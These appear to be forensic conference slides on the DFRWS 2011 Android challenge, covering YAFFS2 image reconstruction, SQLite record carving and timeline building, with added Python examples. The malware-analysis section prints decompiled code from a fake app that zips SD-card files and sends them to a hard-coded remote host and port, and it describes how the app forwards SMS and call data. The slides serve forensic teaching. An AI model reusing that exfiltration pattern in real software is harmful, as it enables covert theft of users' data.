Turning Android inside out - SANS Computer Forensics
Uploaded 14 Dec 2013

Turning Android inside out


DFRWS 2011 Challenge

Ivo Pooters
Fox-IT
pooters@fox-it.com
Case description

Android phone 1: Donald Norby
- Dead
- What happened?

Android phone 2: Yob Taog
- Data breach at SwiftLogic: IP leaked
- Guilty?
Data acquisition

- SD card: regular imaging tools
- NAND contains multiple partitions:
  - MTD mounted on /data
  - MTD mounted on /cache
- Case 1: root + dd used
  - No OOB content! dd of the MTD block device copies only the data area of each flash page; the spare (out-of-band) area, where YAFFS2 keeps its tags, is not part of the image.
- Case 2: root + nanddump used
  - nanddump can include the OOB bytes; cross-compile it for ARM
The low hanging fruit

Norby's data:
- 9 PDF files in the sdcard/download folder
- The PDF files contain schematics of SwiftLogic
- From cache: carved HTML pages of Taog's social media pages and Google searches
- The cases are linked!
A relevant HTML file

On Norby's phone, in the cache partition: a directory listing page of Apache, protected by htaccess.
Nice, an IP address! Hm, the origin of the 9 PDF files?
FILE SYSTEM RECONSTRUCTION
Taog's phone

"I would really like to perform a keyword search now, but the tools don't understand YAFFS2 images."
Rebuilding the file system

- Use a mobile forensic toolkit (UFED, XRY)
- Use unyaffs2 (http://code.google.com/p/yaffs2utils)
  - Doesn't work properly on 'real' images
- Use the Android emulator
  - Extract files using adb
- Rebuild the Linux kernel with YAFFS2 support
YAFFS2 in Linux

1. Clean Ubuntu installation
2. Get the YAFFS2 source repository (http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary)
3. Patch it into the kernel
4. Use nandsim to simulate a NAND device
5. Use nandwrite to write the image to the device
   - Don't forget the -r switch, so that the OOB bytes in the nanddump image are written to the spare area:
     nandwrite -a -r /dev/mtdX ~/DFRWS/mtdX.dd

And presto:
mount /dev/mtdblock0 /mnt/case2/data

fox@server1104:/mnt/case2/data$ ls -l
total 27
drwxrwx--x 1 fox fox 2048 2011-05-05 04:06 anr
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 app
drwxrwx--x 1 fox fox 2048 1970-01-01 01:02 app-private
drwx------ 1 fox fox 2048 1970-01-01 01:02 backup
-rw-rw-rw- 1 root root 8 2011-05-11 02:45 cc_data
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 dalvik-cache
drwxrwx--x 1 fox fox 2048 2011-05-08 05:09 data
drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic
drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local
drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found
drwxrwx--t 1 fox 9998 2048 2011-05-11 02:45 misc
drwx------ 1 root root 2048 2011-05-10 22:43 property
drwxrwxr-x 1 fox fox 2048 2011-05-11 02:42 system
drwxr-xr-x 1 fox fox 2048 2011-05-07 18:50 tombstones
Note: the owner shows as "fox" because the analysis host's user has UID 1000 / GID 1000, which on Android is the system user; the other numeric owners (1007, 2000, 9998) are Android IDs with no entry in the host's /etc/passwd.
A suspicious application

- Perform a keyword search
  - Phone numbers, names, other relevant terms
- Hit on IP address 50.56.29.109 in
  /data/dalvik-cache/data@app@com.andriod.mm.apk@classes.dex
- Hmm!
MALWARE ANALYSIS
Taog's phone

"What is that IP address doing in this application??"

com.andriod.mm

- Not in the Android Market
- data/system/packages.xml
  - Installed on the evening the phone was bought
- Retrieve the APK for reverse engineering: /data/app/com.andriod.mm.apk (the path encoded in the dalvik-cache file name)
  - unzip it!
- Convert dex (bytecode) to a regular jar: dex2jar
Analysis of AndroidManifest.xml

Permissions:
<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
[...]

Triggers:
<receiver [...] android:name="com.andriod.mm.bootComp">
  <intent-filter>
    <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" />
    <action android:name="android.intent.action.BOOT_COMPLETED" />
    <action android:name="android.intent.action.SCREEN_OFF" />
  </intent-filter>
</receiver>
[...]

Use apktool (code.google.com/p/android-apktool) to decode the binary manifest into readable XML. Note that ACTION_SCREEN_OFF is never delivered to a manifest-declared receiver (it has to be registered at runtime with registerReceiver), so of the three actions only BOOT_COMPLETED and AIRPLANE_MODE_CHANGED can actually start this receiver.
Analysis of Java code

[...]
private static final String DEFAULTHOST = "50.56.29.109";
private static final int DEFAULTPORT = 10001;
[...]

int sendFile(String s) {
    [...]
    socket = SocketFactory.getDefault().createSocket("50.56.29.109", 10001);
    outputstream = socket.getOutputStream();
    outputstream1.write(abyte2, k1, l1);
    [...]
}

Use JD-GUI for decompilation (java.decompiler.free.fr/?q=jdgui).
Apparently files are sent to this server.
Analysis of Java code (2)

- Secretly steals SD data:
  - On trigger, the SD card is scanned for files
  - Files are zipped and sent to 50.56.29.109:10001
  - SMS "pkg uploaded"
- Monitors calls:
  - SMS "Callin" + number + date/time
- Monitors received text messages and forwards them:
  - SMS "FORWARDED SMS from" + originating address + " at" + date/time + ": ksms" + message
CARVING SQLITE RECORDS
Norby's phone

"Now, let's examine Norby's phone."

About YAFFS2
[Figure: flash chunks laid out as Header, Data 1, Data 1, Header, Data 2, Data 1, Header, ...; the out-of-band bytes carry the per-chunk header (tags), and the chunks of one file are scattered over the flash: high fragmentation]

Challenge

- The user data and cache partitions are YAFFS2 formatted
- Remember, we don't have the OOB bytes
- File reconstruction is very difficult, to say the least
- Regular carving tools perform poorly
- But we really want those SQLite records
SQLite format
[Figure: a b-tree of one root page, interior pages and leaf pages. Within a page, by offset: page header, cell pointer array, unallocated area, cell content area. The data records are in the cell content area; the schema and the SQLite signature are stored in the root page. Pages are not fragmented: a page lies within a single flash chunk.]
The idea

1. Identify SQLite pages in the raw YAFFS2 image by page signature
2. Parse out the records using the cell pointer array
3. Match the anonymous records against predefined templates
   - Analyze the important SQLite databases for their table format
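The three steps above as a worked example. This is code added here, not code from the slides or from Fox-IT, and it rests on assumptions: 1024-byte SQLite pages and 2048-byte YAFFS2 chunks (typical for 2011-era Android), and an `sms` table layout that is only loosely modelled on Android's mmssms.db, not the real schema. The sample "image" is constructed in the script itself with Python's sqlite3 module; the phone number and message texts in it are taken from the slides, the dates are made up.

```python
"""Carve SQLite table-leaf pages and records from a raw flash image (added example)."""
import os, sqlite3, struct, tempfile
PAGE_SIZE = 1024    # assumption: SQLite page size used on the device
CHUNK = 2048        # assumption: YAFFS2 chunk (NAND page) size
LEAF_TABLE = 0x0D   # b-tree page type byte of a table leaf page

def read_varint(buf, pos):
    """SQLite varint: big-endian, 7 bits per byte, at most 9 bytes."""
    value = 0
    for i in range(8):
        b = buf[pos + i]
        value = (value << 7) | (b & 0x7F)
        if b < 0x80:
            return value, pos + i + 1
    return (value << 8) | buf[pos + 8], pos + 9   # 9th byte carries all 8 bits

def serial_info(t):
    """(byte length, type class N/I/F/T/B) of record serial type t."""
    if t in (10, 11):
        raise ValueError('reserved serial type')
    if t >= 12:
        return (t - 12) // 2, 'B' if t % 2 == 0 else 'T'
    return (0, 1, 2, 3, 4, 6, 8, 8, 0, 0)[t], 'NIIIIIIFII'[t]

def decode_value(t, raw):
    if t == 0:
        return None
    if t == 7:
        return struct.unpack('>d', raw)[0]
    if t < 12:
        return int.from_bytes(raw, 'big', signed=True) if t < 7 else t - 8
    return bytes(raw) if t % 2 == 0 else raw.decode('utf-8', 'replace')

def is_leaf_table_page(page):
    """Step 1: structural signature, much stricter than the 0x0D byte alone."""
    if len(page) != PAGE_SIZE or page[0] != LEAF_TABLE:
        return False
    first_free, ncells, content = struct.unpack('>HHH', page[1:7])
    if not (ncells and 8 + 2 * ncells <= content <= PAGE_SIZE):
        return False
    ptrs = struct.unpack('>%dH' % ncells, page[8:8 + 2 * ncells])
    return all(content <= p < PAGE_SIZE for p in ptrs) and (
        first_free == 0 or content <= first_free < PAGE_SIZE)

def parse_leaf_page(page):
    """Step 2: walk the cell pointer array; return (rowid, serial types, values)."""
    ncells = struct.unpack('>H', page[3:5])[0]
    records = []
    for off in struct.unpack('>%dH' % ncells, page[8:8 + 2 * ncells]):
        try:
            payload_len, pos = read_varint(page, off)
            rowid, pos = read_varint(page, pos)
            if payload_len > PAGE_SIZE - 35 or pos + payload_len > PAGE_SIZE:
                continue                   # spills into overflow pages, or corrupt
            hd_len, p = read_varint(page, pos)
            types = []
            while p < pos + hd_len:
                t, p = read_varint(page, p)
                types.append(t)
            body, values = pos + hd_len, []
            for t in types:
                n = serial_info(t)[0]
                if body + n > pos + payload_len:
                    raise ValueError('record body overruns payload')
                values.append(decode_value(t, page[body:body + n]))
                body += n
            records.append((rowid, tuple(types), tuple(values)))
        except (IndexError, ValueError, struct.error):
            continue                       # junk that slipped past the signature
    return records

def matches(template, types):
    """Step 3: template = one string of allowed type classes per column."""
    return len(types) == len(template) and all(
        serial_info(t)[1] in allowed for t, allowed in zip(types, template))

# _id is INTEGER PRIMARY KEY, i.e. the rowid, stored as NULL in the record body.
TEMPLATES = {'sms': ['N', 'I', 'T', 'I', 'I', 'TN']}   # assumed column layout

def carve(image, templates=TEMPLATES):
    """Scan at page alignment; return (offset, table, rowid, values) hits."""
    hits = []
    for off in range(0, len(image) - PAGE_SIZE + 1, PAGE_SIZE):
        page = image[off:off + PAGE_SIZE]
        if is_leaf_table_page(page):
            for rowid, types, values in parse_leaf_page(page):
                for name, tmpl in templates.items():
                    if matches(tmpl, types):
                        hits.append((off, name, rowid, values))
    return hits

def build_sample_image():
    """Constructed test data: a two-page sms-like database, one page per chunk
    in erased-flash (0xFF) filler, plus a decoy chunk that starts with 0x0D."""
    path = tempfile.NamedTemporaryFile(suffix='.db', delete=False).name
    con = sqlite3.connect(path)
    con.execute('PRAGMA page_size=%d' % PAGE_SIZE)
    con.execute('CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, '
                'address TEXT, date INTEGER, type INTEGER, body TEXT)')
    con.executemany('INSERT INTO sms VALUES (NULL, ?, ?, ?, ?, ?)',
                    [(1, '4439264768', 1304877934000, 2, 'Got some results'),
                     (1, '4439264768', 1304878574000, 1, 'You are joking, right?')])
    con.commit()
    con.close()
    db = open(path, 'rb').read()
    os.unlink(path)
    image = bytearray(b'\xff' * (4 * CHUNK))
    image[0:PAGE_SIZE] = db[0:PAGE_SIZE]                          # page 1: header + schema
    image[CHUNK:CHUNK + 8] = b'\x0d\x00\x00\x00\x05\x00\x10\x00'  # decoy: 5 cells, content at 16
    image[2 * CHUNK:2 * CHUNK + PAGE_SIZE] = db[PAGE_SIZE:]       # page 2: the sms leaf
    return bytes(image)
```

Running `carve(build_sample_image())` returns the two sms rows at offset 4096 and nothing else: the decoy at offset 2048 has a 0x0D first byte but its cell pointer array would overlap the claimed content area, which is exactly the kind of false positive a one-byte signature lets through. Three limits to keep in mind on a real image: page 1 of each database is skipped because its leaf header sits behind the 100-byte file header; records that spill into overflow pages and records lying in freeblocks (deleted rows) are not parsed; and a template only checks the type shape of a record, so a table with the same column types will match too and the hits still need to be reviewed by hand.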
Results (Contacts)

Call log:
id | number     | date/time (utc)        | duration | type | name
1  | 4439264768 | 05/04/2011 11:31:08 PM | 341      | Out  | Mr E
2  | 4126263802 | 05/05/2011 12:04:01 AM | 91       | Out  |
3  | 4439264768 | 05/05/2011 12:38:17 AM | 115      | Out  | Mr E
4  | 4126263802 | 05/05/2011 03:18:33 PM | 84       | Out  |
5  | 4439264768 | 05/08/2011 06:46:24 PM | 381      | In   | Mr E

Contacts:
Id | display name | extra info
1  | Mr E         | mre@hushmail.com, 443-926-4768, Mr E
2  | Taog         | Taog, Taog, 4123933388
3  | mr e         | 4439264768, mr
Results (SMS)

The same id shows up more than once (155 first as pending, then as out; 156 and 158 with the flag 0 and then 1): on YAFFS2 every update of an SQLite page is written to a fresh chunk, so carving recovers the superseded versions of a record as well as the current one. Two glyphs in the body of record 154 could not be recovered and are shown as [?].

id  | number     | date/time              | flag | status  | body
154 | 4123933388 | 05/08/2011 04:12:16 AM | 1    | in      | ksmsv[?]wsms://message/pkg uploaded[?]
154 | 4123933388 | 05/08/2011 04:12:16 AM | 0    | in      | ksmsv[?]wsms://message/pkg uploaded[?]
155 |            | 05/08/2011 04:13:48 AM | 1    | draft   | Got something for you, sample shortly
155 |            | 05/08/2011 05:31:28 PM | 1    | draft   | Got something for you, sample shortly
155 | 4439264768 | 05/08/2011 06:05:34 PM | 1    | pending | Got some results, I think we need to up the fee, say double?
155 | 4439264768 | 05/08/2011 06:05:34 PM | 1    | out     | Got some results, I think we need to up the fee, say double?
156 | 4439264768 | 05/08/2011 06:16:14 PM | 0    | in      | You are joking, right? You can't seriously think about changing the deal now.
156 | 4439264768 | 05/08/2011 06:16:14 PM | 1    | in      | You are joking, right? You can't seriously think about changing the deal now.
157 | 4439264768 | 05/08/2011 06:22:39 PM | 1    | pending | I just sent you a sample, I think you'll be pleased...
157 | 4439264768 | 05/08/2011 06:22:39 PM | 1    | out     | I just sent you a sample, I think you'll be pleased...
158 | 4439264768 | 05/08/2011 06:30:13 PM | 0    | in      | You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
158 | 4439264768 | 05/08/2011 06:30:13 PM | 1    | in      | You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
159 | 4439264768 | 05/08/2011 06:56:44 PM | 1    | pending | I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange
159 | 4439264768 | 05/08/2011 06:56:44 PM | 1    | out     | I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange
Results (Browser)

Saved credentials:
id | host         | username | password
1  | 50.56.29.109 | norby    | aaassspp

History:
Id | Date/time              | Title                                        | URL                                         | Visits
34 | 05/06/2011 06:27:36 PM | yob_taog - Twitter Search                    | http://search.twitter.com/search?q=yob_taog | 1
34 | 05/06/2011 06:27:36 PM |                                              | http://search.twitter.com/search?q=yob_taog | 1
35 | 05/06/2011 06:27:47 PM |                                              | http://m.twitter.com/yob_taog               | 1
36 | 05/06/2011 06:27:47 PM | Twitter                                      | http://mobile.twitter.com/yob_taog          | 1
36 | 05/06/2011 06:27:47 PM |                                              | http://mobile.twitter.com/yob_taog          | 1
37 | 05/06/2011 06:28:09 PM | Twitpic - Share photos and videos on Twitter | http://twitpic.com/4tscf6                   | 1
37 | 05/06/2011 06:28:09 PM |                                              | http://twitpic.com/4tscf6                   | 1
38 | 05/06/2011 06:28:26 PM | Twitpic - Share photos and videos on Twitter | http://twitpic.com/4tvmcu                   | 1
38 | 05/06/2011 06:28:26 PM |                                              | http://twitpic.com/4tvmcu                   | 1
16 | 05/08/2011 05:58:34 PM |                                              | http://www.google.com/m?source=android-home | 3
39 | 05/08/2011 05:59:28 PM |                                              | http://50.56.29.109/ss/                     | 1
39 | 05/08/2011 05:59:28 PM | Index of /ss                                 | http://50.56.29.109/ss/                     | 1
39 | 05/08/2011 06:28:05 PM | Index of /ss                                 | http://50.56.29.109/ss/                     | 2
CONNECTING THE DOTS
Conclusion

Creating the timeline
- Normalized all times to UTC
- Determine the timezone of each source
- Analyst's Notebook for the timeline
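The two normalisation bullets above, as an added example (not the talk's own tooling): Android's SQLite tables (sms, calls, browser history) store milliseconds since the Unix epoch, which are already UTC; file-system timestamps are seconds since the epoch; a time read off a carved web page or a witness statement is local wall clock and only becomes usable once the analyst has fixed that source's UTC offset. The sources, values and the UTC-4 offset in the sample are constructed for the demonstration, not findings from the case.

```python
"""Merge timestamps from several phone artefacts into one UTC timeline (added example)."""
from datetime import datetime, timedelta, timezone

UTC = timezone.utc

def epoch_to_utc(value):
    """Seconds or milliseconds since the Unix epoch (treated as ms above 1e11)."""
    if value > 10 ** 11:
        value = value / 1000.0
    return datetime.fromtimestamp(value, UTC)

def local_to_utc(text, offset_hours, fmt='%m/%d/%Y %I:%M:%S %p'):
    """Wall-clock string from a source whose UTC offset the analyst determined."""
    tz = timezone(timedelta(hours=offset_hours))
    return datetime.strptime(text, fmt).replace(tzinfo=tz).astimezone(UTC)

def build_timeline(events):
    """events: (source, description, kind, value[, offset_hours]); kind is
    'epoch' for SQLite / file-system numbers or 'local' for wall-clock strings."""
    rows = []
    for ev in events:
        source, desc, kind, value = ev[:4]
        if kind == 'epoch':
            ts = epoch_to_utc(value)
        elif kind == 'local':
            ts = local_to_utc(value, ev[4])
        else:
            raise ValueError('unknown timestamp kind %r' % kind)
        rows.append((ts, source, desc))
    rows.sort()
    return [(ts.strftime('%Y-%m-%d %H:%M:%S UTC'), s, d) for ts, s, d in rows]

# Constructed sample events; the values and the UTC-4 shop offset are invented.
SAMPLE_EVENTS = [
    ('taog:sms', 'malware SMS "pkg uploaded"', 'epoch', 1304827936000),       # ms, UTC
    ('norby:browser', 'visit http://50.56.29.109/ss/', 'epoch', 1304877568000),
    ('norby:cache', 'mtime of carved HTML page', 'epoch', 1304877600),        # s, UTC
    ('shop:receipt', 'phone bought (shop local time)', 'local', '05/03/2011 07:42:00 PM', -4),
]
```

`build_timeline(SAMPLE_EVENTS)` returns the events in UTC order with the shop receipt first, even though its local string looks later than nothing else in the list; mixing a local wall-clock value into a list of epoch values without converting it is the usual way a timeline ends up with events in the wrong order.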
Timeline
[Three graphical timeline slides, not reproduced here]

Conclusions/Reconstruction
- Taog is the victim of an attack
- Malware was installed on his device at the phone shop before purchase
- The schematics of SwiftLogic were secretly uploaded to the web portal
- Norby downloaded the schematics
- Norby tries to get more out of the deal
- ...and gets killed by Mr E